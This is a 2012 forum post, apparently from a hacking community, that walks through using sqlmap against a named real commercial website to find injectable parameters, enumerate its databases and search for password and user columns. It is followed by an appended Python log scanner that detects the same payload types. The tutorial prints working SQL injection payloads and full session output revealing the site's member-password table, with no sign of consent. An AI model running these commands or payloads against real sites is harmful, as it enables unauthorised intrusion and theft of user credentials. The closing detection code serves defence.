06-29-2012, 07:13 AM
assalamualaikum wr wb
Good morning, everyone.
It's been a long time since I shared any tricks and tips, so I've missed it ^_^
Hmm, this time I want to share something about using sqlmap.
Up to now, the way sqlmap gets used can pretty much always be described like this
(for the example, don't go hammering the site)
Code:
1. junior@riau:/pentest/database/sqlmap# ./sqlmap.py -u http://www.kingkitchen.co.th/product/category.php?CID=14 --random-agent --threads 10 --banner
then
junior@riau:/pentest/database/sqlmap# ./sqlmap.py -u http://www.kingkitchen.co.th/product/category.php?CID=14 --random-agent --threads 10 --dbs
or
junior@riau:/pentest/database/sqlmap# ./sqlmap.py -u http://www.kingkitchen.co.th/product/category.php?CID=14 --dbs
2. junior@riau:/pentest/database/sqlmap# ./sqlmap.py -u http://www.kingkitchen.co.th/product/category.php?CID=14 --random-agent --threads 10 -D dbname --tables
3. junior@riau:/pentest/database/sqlmap# ./sqlmap.py -u http://www.kingkitchen.co.th/product/category.php?CID=14 --random-agent --threads 10 -D dbname -T tbl_name --columns
4. junior@riau:/pentest/database/sqlmap# ./sqlmap.py -u http://www.kingkitchen.co.th/product/category.php?CID=14 --random-agent --threads 10 -D dbname -T tbl_name -C clm_name1,clm_name2,... --dump
Now, here
I no longer follow exactly the steps above.
I use the --search option to look directly for the login table, or for tables that appear to have a login or password column, so it can replace the --tables and --columns options.
OK, straight to it
Code:
junior@riau:/pentest/database/sqlmap# ./sqlmap.py -u http://www.kingkitchen.co.th/product/category.php?CID=14 --threads 10 -D kingkitc_kkcdb --search -C pass,user
sqlmap/1.0-dev (r5131) - automatic SQL injection and database takeover tool
http://www.sqlmap.org
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 05:54:43
[05:54:43] [INFO] using '/pentest/web/scanners/sqlmap/output/www.kingkitchen.co.th/session' as a session file
[05:54:43] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[05:54:43] [INFO] testing connection to the target url
[05:54:44] [WARNING] there is a DBMS error found in the HTTP response bodywhich could interfere with the results of the tests
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: CID
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: CID=14 AND 6999=6999
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: CID=14 AND (SELECT 2410 FROM(SELECT COUNT(*),CONCAT(0x3a686d633a,(SELECT (CASE WHEN (2410=2410) THEN 1 ELSE 0 END)),0x3a6177753a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: UNION query
Title: MySQL UNION query (NULL) - 4 columns
Payload: CID=14 LIMIT 1,1 UNION ALL SELECT NULL, CONCAT(0x3a686d633a,0x6b595675485144425450,0x3a6177753a), NULL, NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: CID=14 AND SLEEP(5)
---
[05:54:44] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.0.64, PHP 5.2.9
back-end DBMS: MySQL 5.0
do you want sqlmap to consider provided column(s):
[1] as LIKE column names (default)
[2] as exact column names
> 1
[05:54:46] [INFO] searching columns like 'pass' in database 'kingkitc_kkcdb'
[05:54:47] [INFO] the SQL query used returns 1 entries
[05:54:48] [INFO] retrieved: kingkitc_kkcdb
[05:54:48] [INFO] retrieved: MEMBER
[05:54:48] [INFO] fetching columns like 'pass' for table 'MEMBER' in database 'kingkitc_kkcdb'
[05:54:50] [INFO] the SQL query used returns 1 entries
[05:54:50] [INFO] retrieved: MPassword
[05:54:51] [INFO] retrieved: varchar(10)
[05:54:51] [INFO] searching columns like 'user' for table 'MEMBER' in database 'kingkitc_kkcdb'
[05:54:51] [INFO] fetching columns like 'user' for table 'MEMBER' in database 'kingkitc_kkcdb'
[05:54:53] [ERROR] unable to retrieve the columns for any table in database 'kingkitc_kkcdb'
Columns like 'user' were found in the following databases:
Columns like 'pass' were found in the following databases:
Database: kingkitc_kkcdb
Table: MEMBER
[1 column]
+-----------+-------------+
| Column | Type |
+-----------+-------------+
| MPassword | varchar(10) |
+-----------+-------------+
do you want to dump entries? [Y/n] n
[05:57:34] [INFO] fetched data logged to text files under '/pentest/web/scanners/sqlmap/output/www.kingkitchen.co.th'
[*] shutting down at 05:57:34
The --search option is always followed by the -C parameter1,parameter2,... option and the -T parameter1,parameter2,... option, or by just one of them.
Code:
-C is used to search for column names in the database based on the parameters supplied
-T is used to search for table names in the database based on the parameters supplied
So from the results we immediately know the table name, don't we?
All that's left is to dump that table directly.
OK, that's all from me for now.
It's already past 6, I'll be late for school ^_^
junior takes his leave
regards
junior dragon
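As an added example (my own code, not part of the post above): the four payload types sqlmap reports in the session output (boolean-based, error-based with FLOOR(RAND(0)*2), UNION query, time-based SLEEP) leave recognisable traces in the web server's access log even when --random-agent hides the sqlmap User-Agent, so a defender can match the decoded query string instead. The log lines and the 203.0.113.7 address are constructed for the example, not taken from the post's target.

```python
import re
from urllib.parse import unquote_plus

# Constructed Apache combined-format lines: one benign request followed by one
# request per technique class shown in the post's sqlmap output.
SAMPLE_LOG = """\
203.0.113.7 - - [29/Jun/2012:05:54:43 +0700] "GET /product/category.php?CID=14 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [29/Jun/2012:05:54:44 +0700] "GET /product/category.php?CID=14%20AND%206999%3D6999 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [29/Jun/2012:05:54:44 +0700] "GET /product/category.php?CID=14%20AND%20(SELECT%202410%20FROM(SELECT%20COUNT(*),CONCAT(0x3a686d633a,(SELECT%20(CASE%20WHEN%20(2410%3D2410)%20THEN%201%20ELSE%200%20END)),0x3a6177753a,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a) HTTP/1.1" 500 311 "-" "Mozilla/5.0"
203.0.113.7 - - [29/Jun/2012:05:54:45 +0700] "GET /product/category.php?CID=14%20LIMIT%201,1%20UNION%20ALL%20SELECT%20NULL,%20CONCAT(0x3a686d633a,0x6b595675485144425450,0x3a6177753a),%20NULL,%20NULL%23 HTTP/1.1" 200 4877 "-" "Mozilla/5.0"
203.0.113.7 - - [29/Jun/2012:05:54:46 +0700] "GET /product/category.php?CID=14%20AND%20SLEEP(5) HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

# Minimal combined-log parser: source IP, timestamp, request path, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Signatures for the technique classes listed in the sqlmap session output.
SIGNATURES = {
    "boolean-based blind": re.compile(r"\bAND\s+\d+\s*=\s*\d+\b", re.I),
    "error-based (FLOOR/RAND)": re.compile(r"FLOOR\s*\(\s*RAND\s*\(\s*0\s*\)\s*\*\s*2\s*\)", re.I),
    "UNION query": re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b", re.I),
    "time-based blind": re.compile(r"\b(SLEEP|BENCHMARK)\s*\(", re.I),
}


def classify(query_string):
    """Return the technique names whose signature matches the URL-decoded query string."""
    decoded = unquote_plus(query_string)  # %20 -> space, %3D -> '=', %23 -> '#'
    return [name for name, rx in SIGNATURES.items() if rx.search(decoded)]


def scan_log(text):
    """Yield (ip, timestamp, [techniques]) for every log line carrying an injection payload."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        hits = classify(m.group("path").partition("?")[2])
        if hits:
            findings.append((m.group("ip"), m.group("ts"), hits))
    return findings


def techniques_per_ip(findings):
    """Several distinct technique classes from one IP within seconds is the stronger sqlmap signal."""
    seen = {}
    for ip, _ts, hits in findings:
        seen.setdefault(ip, set()).update(hits)
    return seen


if __name__ == "__main__":
    for ip, ts, hits in scan_log(SAMPLE_LOG):
        print(ip, ts, ", ".join(hits))
```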